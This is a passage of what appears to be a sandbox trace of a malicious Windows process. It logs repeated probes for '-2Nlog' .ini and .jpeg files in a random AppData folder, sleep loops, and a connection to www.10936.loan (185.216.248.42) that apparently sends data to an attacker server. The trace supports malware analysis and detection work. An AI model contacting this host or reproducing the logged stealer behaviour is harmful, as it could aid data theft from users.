"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.940] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.940] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0163.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.940] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.940] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.940] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928fd0) returned 1 [0163.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.940] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.940] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.940] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.940] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.940] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.940] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0163.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.940] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.941] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0163.941] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.941] Sleep (dwMilliseconds=0x7d0) [0163.942] Sleep (dwMilliseconds=0x7d0) [0163.944] Sleep (dwMilliseconds=0x7d0) [0163.945] Sleep (dwMilliseconds=0x7d0) [0163.946] Sleep (dwMilliseconds=0x7d0) [0163.948] Sleep (dwMilliseconds=0x7d0) [0163.949] Sleep (dwMilliseconds=0x7d0) [0163.951] Sleep (dwMilliseconds=0x7d0) [0163.952] Sleep (dwMilliseconds=0x7d0) [0163.954] Sleep (dwMilliseconds=0x7d0) [0163.955] Sleep (dwMilliseconds=0x7d0) [0163.957] Sleep (dwMilliseconds=0x7d0) [0163.958] Sleep (dwMilliseconds=0x7d0) [0163.960] Sleep (dwMilliseconds=0x7d0) [0163.961] Sleep (dwMilliseconds=0x7d0) [0163.962] Sleep (dwMilliseconds=0x7d0) [0163.964] Sleep (dwMilliseconds=0x7d0) [0163.966] Sleep (dwMilliseconds=0x7d0) [0163.967] Sleep (dwMilliseconds=0x7d0) [0163.968] Sleep (dwMilliseconds=0x7d0) [0163.970] Sleep (dwMilliseconds=0x7d0) [0163.971] Sleep (dwMilliseconds=0x7d0) [0163.973] Sleep (dwMilliseconds=0x7d0) [0163.974] Sleep (dwMilliseconds=0x7d0) [0163.976] Sleep (dwMilliseconds=0x7d0) [0163.977] Sleep (dwMilliseconds=0x7d0) [0163.979] Sleep (dwMilliseconds=0x7d0) [0163.980] Sleep (dwMilliseconds=0x7d0) [0163.982] Sleep (dwMilliseconds=0x7d0) [0163.983] Sleep (dwMilliseconds=0x7d0) [0163.985] Sleep (dwMilliseconds=0x7d0) [0163.986] Sleep (dwMilliseconds=0x7d0) [0163.988] Sleep (dwMilliseconds=0x7d0) [0163.989] Sleep (dwMilliseconds=0x7d0) [0163.991] Sleep (dwMilliseconds=0x7d0) [0163.992] Sleep (dwMilliseconds=0x7d0) [0163.994] Sleep (dwMilliseconds=0x7d0) [0163.995] Sleep (dwMilliseconds=0x7d0) [0163.996] Sleep (dwMilliseconds=0x7d0) [0163.998] Sleep (dwMilliseconds=0x7d0) [0163.999] Sleep (dwMilliseconds=0x7d0) [0164.001] Sleep (dwMilliseconds=0x7d0) [0164.002] Sleep (dwMilliseconds=0x7d0) [0164.004] Sleep (dwMilliseconds=0x7d0) [0164.005] Sleep (dwMilliseconds=0x7d0) [0164.007] Sleep (dwMilliseconds=0x7d0) [0164.008] Sleep (dwMilliseconds=0x7d0) [0164.010] Sleep (dwMilliseconds=0x7d0) [0164.011] Sleep (dwMilliseconds=0x7d0) [0164.013] Sleep (dwMilliseconds=0x7d0) [0164.014] Sleep (dwMilliseconds=0x7d0) [0164.016] Sleep (dwMilliseconds=0x7d0) [0164.017] Sleep (dwMilliseconds=0x7d0) [0164.019] Sleep (dwMilliseconds=0x7d0) [0164.020] Sleep (dwMilliseconds=0x7d0) [0164.022] Sleep (dwMilliseconds=0x7d0) [0164.023] Sleep (dwMilliseconds=0x7d0) [0164.025] Sleep (dwMilliseconds=0x7d0) [0164.026] Sleep (dwMilliseconds=0x7d0) [0164.028] Sleep (dwMilliseconds=0x7d0) [0164.029] Sleep (dwMilliseconds=0x7d0) [0164.031] Sleep (dwMilliseconds=0x7d0) [0164.032] Sleep (dwMilliseconds=0x7d0) [0164.034] Sleep (dwMilliseconds=0x7d0) [0164.035] Sleep (dwMilliseconds=0x7d0) [0164.037] Sleep (dwMilliseconds=0x7d0) [0164.038] Sleep (dwMilliseconds=0x7d0) [0164.040] Sleep (dwMilliseconds=0x7d0) [0164.041] Sleep (dwMilliseconds=0x7d0) [0164.043] Sleep (dwMilliseconds=0x7d0) [0164.044] Sleep (dwMilliseconds=0x7d0) [0164.046] Sleep (dwMilliseconds=0x7d0) [0164.047] Sleep (dwMilliseconds=0x7d0) [0164.049] Sleep (dwMilliseconds=0x7d0) [0164.050] Sleep (dwMilliseconds=0x7d0) [0164.052] Sleep (dwMilliseconds=0x7d0) [0164.053] Sleep (dwMilliseconds=0x7d0) [0164.055] Sleep (dwMilliseconds=0x7d0) [0164.056] Sleep (dwMilliseconds=0x7d0) [0164.058] Sleep (dwMilliseconds=0x7d0) [0164.059] Sleep (dwMilliseconds=0x7d0) [0164.061] Sleep (dwMilliseconds=0x7d0) [0164.063] Sleep (dwMilliseconds=0x7d0) [0164.064] Sleep (dwMilliseconds=0x7d0) [0164.065] Sleep (dwMilliseconds=0x7d0) [0164.067] Sleep (dwMilliseconds=0x7d0) [0164.068] Sleep (dwMilliseconds=0x7d0) [0164.070] Sleep (dwMilliseconds=0x7d0) [0164.071] Sleep (dwMilliseconds=0x7d0) [0164.073] Sleep (dwMilliseconds=0x7d0) [0164.074] Sleep (dwMilliseconds=0x7d0) [0164.076] Sleep (dwMilliseconds=0x7d0) [0164.077] Sleep (dwMilliseconds=0x7d0) [0164.079] Sleep (dwMilliseconds=0x7d0) [0164.080] Sleep (dwMilliseconds=0x7d0) [0164.082] Sleep (dwMilliseconds=0x7d0) [0164.083] Sleep (dwMilliseconds=0x7d0) [0164.085] Sleep (dwMilliseconds=0x7d0) [0164.086] Sleep (dwMilliseconds=0x7d0) [0164.088] Sleep (dwMilliseconds=0x7d0) [0164.089] Sleep (dwMilliseconds=0x7d0) [0164.091] Sleep (dwMilliseconds=0x7d0) [0164.094] Sleep (dwMilliseconds=0x7d0) [0164.095] Sleep (dwMilliseconds=0x7d0) [0164.097] Sleep (dwMilliseconds=0x7d0) [0164.098] socket (af=2, type=1, protocol=6) returned 0x2580 [0164.098] getaddrinfo (in: pNodeName="www.10936.loan", pServiceName="80", pHints=0x87917f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791828 | out: ppResult=0x8791828*=0x7755d30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x88843a0*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), ai_next=0x0)) returned 0 [0164.425] connect (s=0x2580, name=0x88843a0*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), namelen=16) returned 0 [0164.685] send (s=0x2580, buf=0xa10808a*, len=158, flags=0) returned 158 [0164.685] setsockopt (s=0x2580, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0164.685] recv (in: s=0x2580, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 485 [0164.967] closesocket (s=0x2580) returned 0 [0164.968] Sleep (dwMilliseconds=0x7d0) [0164.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.970] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0164.970] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89297b0) returned 1 [0164.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.970] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0164.970] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a2f0) returned 1 [0164.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.970] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0164.970] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a2f0) returned 1 [0164.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.970] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0164.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89297b0) returned 1 [0164.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.971] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0164.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a2f0) returned 1 [0164.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.971] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0164.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929840) returned 1 [0164.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.971] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0164.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929840) returned 1 [0164.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.971] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0164.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89297b0) returned 1 [0164.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.971] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0164.972] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a2f0) returned 1 [0164.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.972] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0164.972] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89297b0) returned 1 [0164.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.972] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, 